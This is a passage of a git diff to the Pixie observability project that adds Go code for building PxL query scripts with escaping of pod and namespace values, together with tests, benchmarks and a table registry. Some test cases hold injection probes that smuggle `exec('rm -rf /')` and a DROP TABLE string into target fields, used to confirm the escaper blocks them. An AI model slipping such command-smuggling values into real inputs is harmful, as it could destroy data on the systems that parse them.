+)
+
+// ErrUnknownTable is wrapped by QueryFor's error when IsBuiltin rejects the table name.
+var ErrUnknownTable = errors.New("pxl: unknown pixie table")
+
+// pxSetMaxRows raises Pixie's per-table result cap via the query-broker's
+// own `#px:set` query flag (parsed from the script — see
+// src/vizier/services/query_broker/controllers/query_flags.go, default
+// max_output_rows_per_table = 10000). Without it the planner's
+// add_limit_to_batch_result_sink_rule silently truncates any px.display to
+// 10000 rows, so a wide firehose window (or a very busy pod) loses the
+// excess at the read. 1e6 is far above any realistic AE window. See
+// memory project-ae-passthrough-10k-cap.
+const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n"
+
+// QueryFor returns a PxL script that selects rows from `table` for the
+// (namespace, pod) of `t`, time-bounded to [sliceStart, sliceEnd); empty
+// Target fields add no filter. `now` yields a relative `start_time=` for
+// px.DataFrame (PxL rejects ISO-string absolute bounds, so we pad a
+// relative bound and post-filter precisely with px.int64_to_time on
+// time_). A table IsBuiltin rejects returns an ErrUnknownTable-wrapped error.
+func QueryFor(table string, t anomaly.Target, sliceStart, sliceEnd, now time.Time) (string, error) {
+ if !IsBuiltin(table) {
+ return "", fmt.Errorf("%w: %q", ErrUnknownTable, table)
+ }
+ // pad covers (now - sliceStart) plus a 30s safety margin. When
+ // sliceStart is in the future (caller bug), now.Sub is negative and
+ // pad would drop below the margin (even below zero); floor it at 30s.
+ pad := now.Sub(sliceStart) + 30*time.Second
+ if pad < 30*time.Second {
+ pad = 30 * time.Second
+ }
+ relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s"
+
+ var b strings.Builder
+ b.WriteString(pxSetMaxRows)
+ b.WriteString("import px\n")
+ b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n")
+ b.WriteString("df = df[df.time_ >= px.int64_to_time(" + strconv.FormatInt(sliceStart.UnixNano(), 10) + ")]\n")
+ b.WriteString("df = df[df.time_ < px.int64_to_time(" + strconv.FormatInt(sliceEnd.UnixNano(), 10) + ")]\n")
+ b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
+ // px.upid_to_pod_name returns "<namespace>/<pod>" (carnot:
+ // metadata_ops.h UPIDToPodNameUDF::Exec → absl::Substitute("$0/$1", ns, name)),
+ // not the bare pod name. Filtering against bare t.Pod would always
+ // miss; build the namespaced key when we have both fields.
+ b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
+ if t.Namespace != "" {
+ b.WriteString("df = df[df.namespace == '" + escapePxL(t.Namespace) + "']\n")
+ }
+ if t.Pod != "" {
+ if t.Namespace != "" {
+ // Both fields present — use exact equality on the namespaced key.
+ b.WriteString("df = df[df.pod == '" + escapePxL(t.Namespace+"/"+t.Pod) + "']\n")
+ } else {
+ // Pod-only fallback: df.pod is "<namespace>/<pod>", so a bare-pod
+ // equality always misses. Regex-anchor "<any-namespace>/<pod>" via
+ // px.regex_match so the defensive path stays functional.
+ b.WriteString("df = df[px.regex_match('^[^/]+/" + escapePxL(regexp.QuoteMeta(t.Pod)) + "$', df.pod)]\n")
+ }
+ }
+ b.WriteString("px.display(df, '" + table + "')\n")
+ return b.String(), nil
+}
+
+// pxlEscaper turns raw bytes that could break out of a PxL single-quoted
+// string into their Python-style escape sequences. strings.Replacer does
+// not rescan text it has already emitted, so the backslashes it inserts
+// are never escaped a second time, whatever the order of the pairs.
+//
+// Why each entry: PxL is Python; a single-quoted literal closes on a bare
+// ' and a raw newline (0x0A) terminates the statement, letting an
+// attacker-controlled Target.Pod/Target.Namespace value inject a new
+// PxL statement after the close. \, ', \r, \n, \t, and NUL are escaped.
+// NOTE(review): Python reads `\0` followed by octal digits as one longer
+// escape (NUL + "12" → `\012`); confirm for PxL and consider `\x00`.
+var pxlEscaper = strings.NewReplacer(
+ `\`, `\\`,
+ `'`, `\'`,
+ "\n", `\n`,
+ "\r", `\r`,
+ "\t", `\t`,
+ "\x00", `\0`,
+)
+
+func escapePxL(s string) string {
+ return pxlEscaper.Replace(s)
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go
new file mode 100644
index 00000000000..64de6290687
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go
@@ -0,0 +1,69 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// pxl.QueryFor sits on the controller fan-out path: ONE QueryFor call
+// per (anomaly_hash, table) tuple per pass. With 11 PushPixieTables and
+// N active anomaly windows, the per-pass cost is 11×N QueryFor calls
+// (plus 11×N broker queries that the QueryFor strings parameterise).
+//
+// At sustained 100 active anomalies → 1100 QueryFor/sec. Allocation
+// behaviour of fmt.Sprintf-style string builders is what the bench
+// quantifies — informs whether sync.Pool'd strings.Builder would pay
+// off if QueryFor turns up in CPU profiles.
+
+func BenchmarkQueryFor_http_events(b *testing.B) {
+ t := anomaly.Target{
+ PID: 12345,
+ Comm: "java",
+ Pod: "backend-vulnerable-779cd9d765-mxr8t",
+ Namespace: "log4j-poc",
+ }
+ now := time.Now()
+ start := now.Add(-30 * time.Second)
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _, _ = QueryFor("http_events", t, start, now, now)
+ }
+}
+
+// BenchmarkQueryFor_AllTables varies the table across all 13 BuiltinTables
+// to ensure we're not missing a slow-path on a specific table.
+func BenchmarkQueryFor_AllTables(b *testing.B) {
+ t := anomaly.Target{
+ PID: 12345,
+ Comm: "java",
+ Pod: "backend-vulnerable-779cd9d765-mxr8t",
+ Namespace: "log4j-poc",
+ }
+ now := time.Now()
+ start := now.Add(-30 * time.Second)
+ tables := Names(Builtins())
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _, _ = QueryFor(tables[i%len(tables)], t, start, now, now)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go
new file mode 100644
index 00000000000..562ea794cc0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go
@@ -0,0 +1,342 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "errors"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// fixed reference time for deterministic relStart computation.
+var (
+ fixedNow = time.Date(2026, 5, 9, 15, 23, 44, 0, time.UTC)
+ fixedStart = fixedNow.Add(-5 * time.Minute) // ATTACK − 5 min
+ fixedEnd = fixedNow.Add(5 * time.Minute) // ATTACK + 5 min
+ target = anomaly.Target{
+ PID: 12345, Comm: "redis-server",
+ Pod: "redis-6fbcfb97c-82qxv", Namespace: "redis",
+ }
+)
+
+// TestQueryFor_UnknownTable — non-builtin tables wrap ErrUnknownTable.
+func TestQueryFor_UnknownTable(t *testing.T) {
+ _, err := QueryFor("nope_table", target, fixedStart, fixedEnd, fixedNow)
+ if err == nil || !errors.Is(err, ErrUnknownTable) {
+ t.Fatalf("want ErrUnknownTable wrapper, got %v", err)
+ }
+ if !strings.Contains(err.Error(), `"nope_table"`) {
+ t.Fatalf("error must echo the bad table name; got %v", err)
+ }
+}
+
+// TestQueryFor_NamespacedPodFilter — px.upid_to_pod_name returns
+// "<namespace>/<pod>" (verified in carnot's metadata_ops.h:387). The
+// generated PxL must filter against the namespaced key when both
+// fields are non-empty.
+func TestQueryFor_NamespacedPodFilter(t *testing.T) {
+ q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ wantPodFilter := `df = df[df.pod == 'redis/redis-6fbcfb97c-82qxv']`
+ if !strings.Contains(q, wantPodFilter) {
+ t.Fatalf("expected pod filter %q in:\n%s", wantPodFilter, q)
+ }
+ wantNS := `df = df[df.namespace == 'redis']`
+ if !strings.Contains(q, wantNS) {
+ t.Fatalf("expected namespace filter %q in:\n%s", wantNS, q)
+ }
+}
+
+// TestQueryFor_NamespaceOnly — only namespace filter when Pod is empty.
+func TestQueryFor_NamespaceOnly(t *testing.T) {
+ tNoPod := anomaly.Target{Namespace: "redis"}
+ q, err := QueryFor("redis_events", tNoPod, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, `df = df[df.namespace == 'redis']`) {
+ t.Fatalf("expected namespace filter; got:\n%s", q)
+ }
+ if strings.Contains(q, "df = df[df.pod ==") {
+ t.Fatalf("did not expect pod filter when Pod is empty; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_PodOnly — when Namespace is empty but Pod is set, fall
+// back to a regex match on `*/<pod>` since px.upid_to_pod_name always
+// returns "<namespace>/<pod>" — a bare-pod equality filter would always
+// miss. The defensive path stays usable instead of being silently broken.
+func TestQueryFor_PodOnly(t *testing.T) {
+ tNoNS := anomaly.Target{Pod: "redis-foo"}
+ q, err := QueryFor("redis_events", tNoNS, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ // Must NOT emit the bare-pod equality (CR: that's a known-miss filter).
+ if strings.Contains(q, `df = df[df.pod == 'redis-foo']`) {
+ t.Fatalf("regression: emitted bare-pod equality that always misses:\n%s", q)
+ }
+ // Must emit a working filter that matches "<namespace>/redis-foo".
+ want := `df = df[px.regex_match('^[^/]+/redis-foo$', df.pod)]`
+ if !strings.Contains(q, want) {
+ t.Fatalf("expected regex-anchored pod filter\nwant: %s\ngot:\n%s", want, q)
+ }
+ if strings.Contains(q, "df = df[df.namespace ==") {
+ t.Fatalf("did not expect namespace filter; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_NoTargetFilters — empty Target → no namespace OR pod
+// filter (caller-driven coarse query).
+func TestQueryFor_NoTargetFilters(t *testing.T) {
+ q, err := QueryFor("redis_events", anomaly.Target{}, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if strings.Contains(q, "df.namespace ==") || strings.Contains(q, "df.pod ==") {
+ t.Fatalf("expected no namespace/pod filter for empty Target; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper — sliceStart
+// is `>=`; sliceEnd is `<`. Encoded as nanos.
+func TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper(t *testing.T) {
+ q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ wantLower := `df = df[df.time_ >= px.int64_to_time(1778339924000000000)]` // 15:18:44 UTC ns
+ wantUpper := `df = df[df.time_ < px.int64_to_time(1778340524000000000)]` // 15:28:44 UTC ns
+ if !strings.Contains(q, wantLower) {
+ t.Fatalf("expected lower bound %q in:\n%s", wantLower, q)
+ }
+ if !strings.Contains(q, wantUpper) {
+ t.Fatalf("expected upper bound %q in:\n%s", wantUpper, q)
+ }
+}
+
+// TestQueryFor_RelativeStartTime — pad covers (now − sliceStart) plus
+// 30 s. With ATTACK − 5min as sliceStart and now == ATTACK, pad is
+// 5 min + 30 s = 330 s.
+func TestQueryFor_RelativeStartTime(t *testing.T) {
+ q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, "start_time='-330s'") {
+ t.Fatalf("expected start_time='-330s' in:\n%s", q)
+ }
+}
+
+// TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture — caller-bug case;
+// pad clamps to 30 s rather than emitting a positive (forward) start.
+func TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture(t *testing.T) {
+ futureStart := fixedNow.Add(1 * time.Minute) // sliceStart > now
+ q, err := QueryFor("redis_events", target, futureStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, "start_time='-30s'") {
+ t.Fatalf("expected start_time='-30s' clamp in:\n%s", q)
+ }
+}
+
+// TestQueryFor_EscapesSingleQuoteInTarget — apostrophes in pod /
+// namespace get backslash-escaped so they don't break out of the
+// PxL string literal.
+func TestQueryFor_EscapesSingleQuoteInTarget(t *testing.T) {
+ tWeird := anomaly.Target{Namespace: "ns'with'quotes", Pod: "p'od"}
+ q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, `df = df[df.namespace == 'ns\'with\'quotes']`) {
+ t.Fatalf("expected escaped namespace; got:\n%s", q)
+ }
+ if !strings.Contains(q, `df = df[df.pod == 'ns\'with\'quotes/p\'od']`) {
+ t.Fatalf("expected escaped namespaced pod key; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_EscapesBackslashInTarget — backslashes too. Asserts
+// both namespace and the namespaced pod-key forms are escaped, so a
+// `Pod` containing `\` can't terminate the PxL string literal.
+func TestQueryFor_EscapesBackslashInTarget(t *testing.T) {
+ tWeird := anomaly.Target{Namespace: `ns\back`, Pod: `p\od`}
+ q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, `df = df[df.namespace == 'ns\\back']`) {
+ t.Fatalf("expected escaped namespace; got:\n%s", q)
+ }
+ if !strings.Contains(q, `df = df[df.pod == 'ns\\back/p\\od']`) {
+ t.Fatalf("expected escaped namespaced pod key; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_EveryBuiltinTableEmits — smoke-test all known tables
+// produce a syntactically-shaped PxL output (compile-not-tested).
+func TestQueryFor_EveryBuiltinTableEmits(t *testing.T) {
+ for _, table := range Names(builtinTables) {
+ q, err := QueryFor(table, target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("table %s: %v", table, err)
+ }
+ if !strings.HasPrefix(q, "#px:set max_output_rows_per_table=1000000\nimport px\n") {
+ t.Fatalf("table %s: expected #px:set cap header then import px; got:\n%s", table, q)
+ }
+ if !strings.Contains(q, "px.display(df, '"+table+"')") {
+ t.Fatalf("table %s: expected px.display call with table name; got:\n%s", table, q)
+ }
+ }
+}
+
+// TestEscapePxL_TableDriven — direct coverage of the escaper. Every byte
+// that could break out of a single-quoted PxL string literal must come
+// back as a non-breaking escape sequence.
+func TestEscapePxL_TableDriven(t *testing.T) {
+ cases := []struct{ in, want string }{
+ {"", ""},
+ {"plain", "plain"},
+ {"o'malley", `o\'malley`},
+ {`back\slash`, `back\\slash`},
+ {`mix'and\back`, `mix\'and\\back`},
+ {"'; DROP TABLE alerts; --", `\'; DROP TABLE alerts; --`},
+ // Byte-level string-breaking attempts: a raw \n would terminate
+ // the PxL statement and inject a new one on the next line. The
+ // escaper turns these into Python-style escape sequences that
+ // PxL renders as inert backslash-letter pairs inside the string.
+ {"line1\nline2", `line1\nline2`},
+ {"line1\r\nline2", `line1\r\nline2`},
+ {"col1\tcol2", `col1\tcol2`},
+ {"trailing\x00", `trailing\0`},
+ // The full injection probe targeting Target.Pod/Target.Namespace:
+ // close the literal, inject a new statement, comment out the
+ // trailing fragment. The escaper neutralises the close + newline;
+ // the trailing # stays as a literal '#' inside the string.
+ {"redis-pod', exec('rm -rf /'), '\n#", `redis-pod\', exec(\'rm -rf /\'), \'\n#`},
+ }
+ for _, c := range cases {
+ if got := escapePxL(c.in); got != c.want {
+ t.Errorf("escapePxL(%q) = %q, want %q", c.in, got, c.want)
+ }
+ }
+}
+
+// TestQueryFor_RejectsInjectionInTargetFields drives QueryFor with
+// adversarial Pod/Namespace values and asserts the resulting PxL has
+// EXACTLY the line count of a clean call — proving an injected newline
+// can't add a statement, and the embedded literal stays single-quoted.
+//
+// PxL line breakdown for a fully-populated Target (cf. QueryFor):
+//
+// #px:set ... 1
+// import px 1
+// df = px.DataFrame(...) 1
+// df = df[df.time_ >= ...] 1
+// df = df[df.time_ < ...] 1
+// df.namespace = px.upid_to_namespace(...) 1
+// df.pod = px.upid_to_pod_name(...) 1
+// df = df[df.namespace == '...'] 1
+// df = df[df.pod == '...'] 1
+// px.display(df, '...') 1
+// (trailing newline → empty 11th split) 1
+//
+// Total: 10 statements + trailing empty == strings.Split == 11 entries.
+func TestQueryFor_RejectsInjectionInTargetFields(t *testing.T) {
+ const wantLines = 11
+
+ cases := []struct {
+ name string
+ target anomaly.Target
+ }{
+ {
+ name: "newline-in-pod",
+ target: anomaly.Target{Pod: "p\n', exec('rm -rf /'), '", Namespace: "ns"},
+ },
+ {
+ name: "newline-in-namespace",
+ target: anomaly.Target{Pod: "p", Namespace: "ns\n', exec('rm -rf /'), '"},
+ },
+ {
+ name: "single-quote-only",
+ target: anomaly.Target{Pod: "p'); display('owned", Namespace: "ns"},
+ },
+ {
+ name: "carriage-return",
+ target: anomaly.Target{Pod: "p\rexec('owned')", Namespace: "ns"},
+ },
+ {
+ name: "backslash-escape-of-escape",
+ target: anomaly.Target{Pod: `p\', exec('owned'), \'`, Namespace: "ns"},
+ },
+ {
+ name: "null-byte",
+ target: anomaly.Target{Pod: "p\x00bonus", Namespace: "ns"},
+ },
+ {
+ name: "tab-bytes",
+ target: anomaly.Target{Pod: "p\texec('owned')", Namespace: "ns"},
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.name, func(t *testing.T) {
+ q, err := QueryFor("http_events", c.target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if got := strings.Count(q, "\n") + 1; got != wantLines {
+ t.Fatalf("got %d lines, want %d (injection succeeded?)\n%s", got, wantLines, q)
+ }
+ // The exact statement count: each line must start with
+ // either #px:, import, df, or px.display — anything else is
+ // a smuggled call.
+ for i, line := range strings.Split(q, "\n") {
+ if line == "" {
+ continue
+ }
+ if !strings.HasPrefix(line, "#px:") &&
+ !strings.HasPrefix(line, "import ") &&
+ !strings.HasPrefix(line, "df") &&
+ !strings.HasPrefix(line, "px.display") {
+ t.Fatalf("line %d looks injected: %q\nfull script:\n%s", i, line, q)
+ }
+ }
+ })
+ }
+}
+
+// TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection — pins the exact
+// pod-only filter line (regexp.QuoteMeta, then escapePxL). A probe for
+// "exec(" misses a dropped escapePxL: QuoteMeta alone emits "exec\(".
+func TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection(t *testing.T) {
+	tgt := anomaly.Target{Pod: "p.*'; exec('owned')"}
+	q, err := QueryFor("http_events", tgt, fixedStart, fixedEnd, fixedNow)
+	if err != nil {
+		t.Fatalf("QueryFor: %v", err)
+	}
+	want := `df = df[px.regex_match('^[^/]+/p\\.\\*\'; exec\\(\'owned\'\\)$', df.pod)]`
+	if !strings.Contains(q, want+"\n") || strings.Count(q, "\n") != 9 {
+		t.Fatalf("pod-only path injection succeeded:\nwant line: %s\ngot:\n%s", want, q)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables.go b/src/vizier/services/adaptive_export/internal/pxl/tables.go
new file mode 100644
index 00000000000..c29284ad58a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/tables.go
@@ -0,0 +1,132 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package pxl carries the strongly-typed list of pixie observation
+// tables the adaptive-write feature targets, plus a stub Registry
+// extension point for the future-PR work that lets users plug in their
+// own tables alongside their UI-defined retention scripts.
+//
+// Importantly: the operator does NOT execute PxL itself in the current
+// design. Pixie's retention plugin runs the user-defined PxL scripts
+// and populates ClickHouse. This package is only used to:
+// - enumerate the pixie tables the operator is aware of
+// - keep a stable, named, audit-friendly set (no dynamic discovery)
+// - declare the future Registry extension surface
+package pxl
+
+// TableSpec is the strongly-typed identity of one pixie socket_tracer
+// table the operator knows about. Bare-string identifiers are
+// deliberately avoided in callers — TableSpec carries the table name
+// today and is the natural place to attach future fields (column
+// projections, retention TTLs, semantic tags) without breaking the API.
+type TableSpec struct {
+ // Name is the ClickHouse / Pixie table name. Dotted names
+ // (e.g. "http2_messages.beta") are stored verbatim; backtick
+ // quoting is the responsibility of SQL emitters.
+ Name string
+
+ // Protocol is the wire protocol the table observes. Documentary;
+ // helps an operator audit "which tables are about HTTP".
+ Protocol string
+}
+
+// builtinTables enumerates the 13 pixie socket_tracer tables the
+// adaptive-write feature is shipped with. The order is stable and
+// matches the project's published documentation. Do NOT loop over
+// dynamic discovery to populate this — strong static definition is
+// the requirement. Unexported so the slice cannot be mutated by
+// external callers; use [Builtins] or [DefaultRegistry] for read
+// access (both return defensive copies).
+//
+// conn_stats was previously out-of-scope (rev-1) but is re-added for
+// the rev-2 schema — the rev-2 ClickHouse schema now carries it and the
+// retention-script preset emits it alongside the protocol-events
+// tables. Unlike the protocol tables it carries counters, not
+// per-message rows; ClickHouse MERGEs snapshot rows over the order
+// key (no aggregating engine — each retention-script pull is its own
+// snapshot row).
+var builtinTables = []TableSpec{
+ {Name: "http_events", Protocol: "HTTP/1.x"},
+ {Name: "http2_messages.beta", Protocol: "HTTP/2 + gRPC"},
+ {Name: "dns_events", Protocol: "DNS"},
+ {Name: "redis_events", Protocol: "Redis (RESP)"},
+ {Name: "mysql_events", Protocol: "MySQL"},
+ {Name: "pgsql_events", Protocol: "PostgreSQL"},
+ {Name: "cql_events", Protocol: "Cassandra / CQL"},
+ {Name: "mongodb_events", Protocol: "MongoDB"},
+ {Name: "kafka_events.beta", Protocol: "Kafka"},
+ {Name: "amqp_events", Protocol: "AMQP / RabbitMQ"},
+ {Name: "mux_events", Protocol: "Mux (Twitter Finagle)"},
+ {Name: "tls_events", Protocol: "TLS handshake"},
+ {Name: "conn_stats", Protocol: "Connection-level statistics"},
+}
+
+// Registry is the extension surface for users to register their own
+// tables alongside the built-ins. STUB — not wired into the controller
+// or main.go in this PR. The intended future shape is:
+//
+// ctlCfg.Registry = pxl.Compose(pxl.DefaultRegistry(), userRegistry)
+//
+// where Compose merges built-ins with user additions, and the
+// controller iterates Registry.Tables() instead of the built-in list.
+//
+// Today the controller and main.go consume the built-in list directly
+// (presumably via Builtins; the slice is unexported). The future PR will
+// plumb a Registry through controller.Config and rewrite the consumers.
+type Registry interface {
+ Tables() []TableSpec
+}
+
+// DefaultRegistry returns a Registry over the built-in tables.
+// Future-PR callers compose this with user-supplied registries.
+func DefaultRegistry() Registry { return defaultRegistry{} }
+
+type defaultRegistry struct{}
+
+// Tables returns a defensive copy so callers cannot mutate the
+// package-level table list at runtime.
+func (defaultRegistry) Tables() []TableSpec {
+ return append([]TableSpec(nil), builtinTables...)
+}
+
+// Builtins returns a defensive copy of the built-in table list.
+// Prefer this over a (now removed) exported slice so the global
+// registry cannot be aliased and mutated by callers.
+func Builtins() []TableSpec {
+ return append([]TableSpec(nil), builtinTables...)
+}
+
+// Names flattens a []TableSpec into the matching []string of table
+// names, preserving order. It serves API boundaries that still take
+// bare names (controller.Config.Tables is one).
+func Names(specs []TableSpec) []string {
+	names := make([]string, 0, len(specs))
+	for i := range specs {
+		names = append(names, specs[i].Name)
+	}
+	return names
+}
+
+// IsBuiltin reports whether name exactly matches one of the built-in
+// table names. It is a defensive guard for callers holding bare strings.
+func IsBuiltin(name string) bool {
+	for i := range builtinTables {
+		if builtinTables[i].Name == name {
+			return true
+		}
+	}
+	return false
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables_test.go b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go
new file mode 100644
index 00000000000..273c0f625ee
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go
@@ -0,0 +1,128 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "testing"
+)
+
+// TestBuiltinTables_Count — guard against accidental list churn.
+// The set is the 13 socket_tracer tables in pixie's stirling layer
+// (http_events, http2_messages.beta, dns_events, redis_events,
+// mysql_events, pgsql_events, cql_events, mongodb_events,
+// kafka_events.beta, amqp_events, mux_events, tls_events, conn_stats).
+// Update this guard if the spec adds / removes a table.
+func TestBuiltinTables_Count(t *testing.T) {
+ const want = 13
+ if got := len(builtinTables); got != want {
+ t.Fatalf("builtinTables = %d entries, want %d", got, want)
+ }
+}
+
+// TestBuiltinTables_AllNamesUnique — no duplicates.
+func TestBuiltinTables_AllNamesUnique(t *testing.T) {
+ seen := map[string]bool{}
+ for _, sp := range builtinTables {
+ if seen[sp.Name] {
+ t.Fatalf("duplicate table %q in builtinTables", sp.Name)
+ }
+ seen[sp.Name] = true
+ }
+}
+
+// TestBuiltinTables_AllHaveProtocol — each entry is annotated, so audit
+// queries like "which tables observe HTTP?" work without parsing the name.
+func TestBuiltinTables_AllHaveProtocol(t *testing.T) {
+ for _, sp := range builtinTables {
+ if sp.Protocol == "" {
+ t.Fatalf("BuiltinTable %q missing Protocol annotation", sp.Name)
+ }
+ }
+}
+
+// TestIsBuiltin — defensive guard for bare-string callers.
+func TestIsBuiltin(t *testing.T) {
+ if !IsBuiltin("redis_events") {
+ t.Fatalf("redis_events should be a builtin")
+ }
+ if !IsBuiltin("http2_messages.beta") {
+ t.Fatalf("dotted table http2_messages.beta should be a builtin")
+ }
+ if !IsBuiltin("conn_stats") {
+ t.Fatalf("conn_stats was re-added; should be builtin")
+ }
+ if IsBuiltin("") {
+ t.Fatalf("empty string should not be builtin")
+ }
+}
+
+// TestDefaultRegistry — stub returns builtinTables.
+func TestDefaultRegistry(t *testing.T) {
+ r := DefaultRegistry()
+ got := r.Tables()
+ if len(got) != len(builtinTables) {
+ t.Fatalf("DefaultRegistry().Tables() len %d, want %d", len(got), len(builtinTables))
+ }
+ for i, sp := range builtinTables {
+ if got[i] != sp {
+ t.Fatalf("DefaultRegistry().Tables()[%d] = %+v, want %+v", i, got[i], sp)
+ }
+ }
+}
+
+// TestNames — projection to []string preserves order.
+func TestNames(t *testing.T) {
+ names := Names(builtinTables)
+ if len(names) != len(builtinTables) {
+ t.Fatalf("Names len mismatch")
+ }
+ if names[0] != "http_events" {
+ t.Fatalf("first name = %q, want http_events", names[0])
+ }
+}
+
+// TestDefaultRegistry_Tables_IsCopy — defensive: callers cannot mutate
+// the package-level table list by aliasing the slice returned from
+// DefaultRegistry().Tables(). Append-to-zero-cap is the easy gotcha:
+// if Tables() handed out the backing slice directly, an append-without-
+// reallocation would clobber the next builtin.
+func TestDefaultRegistry_Tables_IsCopy(t *testing.T) {
+ got := DefaultRegistry().Tables()
+ if len(got) == 0 {
+ t.Fatalf("DefaultRegistry().Tables() is empty")
+ }
+ want0 := builtinTables[0].Name
+ got[0].Name = "MUTATED"
+ if builtinTables[0].Name != want0 {
+ t.Fatalf("mutation through DefaultRegistry().Tables() leaked: builtinTables[0].Name=%q, want %q",
+ builtinTables[0].Name, want0)
+ }
+}
+
+// TestBuiltins_IsCopy — same guarantee for the Builtins() accessor.
+func TestBuiltins_IsCopy(t *testing.T) {
+ got := Builtins()
+ if len(got) == 0 {
+ t.Fatalf("Builtins() is empty")
+ }
+ want0 := builtinTables[0].Name
+ got[0].Name = "MUTATED"
+ if builtinTables[0].Name != want0 {
+ t.Fatalf("mutation through Builtins() leaked: builtinTables[0].Name=%q, want %q",
+ builtinTables[0].Name, want0)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel
new file mode 100644
index 00000000000..3b0dafe2ebf
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel
@@ -0,0 +1,24 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
